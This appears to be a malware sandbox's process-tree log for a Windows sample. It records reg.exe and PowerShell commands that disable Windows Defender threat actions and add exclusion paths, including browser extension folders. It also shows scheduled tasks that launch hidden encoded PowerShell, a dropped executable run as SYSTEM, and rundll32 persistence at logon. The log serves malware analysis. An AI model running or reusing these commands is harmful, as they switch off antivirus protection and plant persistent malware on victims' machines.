                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4620
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2340
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4880
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4552
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2220
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2420
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4120
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4612
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:436
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1416
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3484
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2072
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1064
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1996
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:2212
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2012
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:2640
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:2228
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2412
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2364
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2476
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:3028
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1412
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:1628
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:384
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                        PID:432
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4256
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:5104
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1232
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:1628
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:384
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4804
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:3036
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4128
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:632
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:5096
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2532
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:2020
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1776
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:2916
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4968
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:2296
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1208
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3512
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:3516
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /run /I /tn "gdkhekmpj"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:2412
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "gdkhekmpj" /SC once /ST 19:48:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                  PID:3028
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                  schtasks /run /I /tn "XwMyCejzLOqQPkTJD"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1532
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                    schtasks /CREATE /TN "XwMyCejzLOqQPkTJD" /SC once /ST 09:48:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\IYkjdae.exe\" Pt /KIsite_idBXS 385118 /S" /V1 /F
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                    PID:4672
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "gdkhekmpj"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                    PID:4620
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:3292
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:792
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:3792
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3372 -ip 3372
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:3768
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3372 -ip 3372
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:3992
                                                                                                                                                                                                                                                                                                              • C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\IYkjdae.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\IYkjdae.exe Pt /KIsite_idBXS 385118 /S
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                PID:948
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AplGwAcKU\bnHCLm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rzGcUtIiGGHHJZZ" /V1 /F
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                  PID:3400
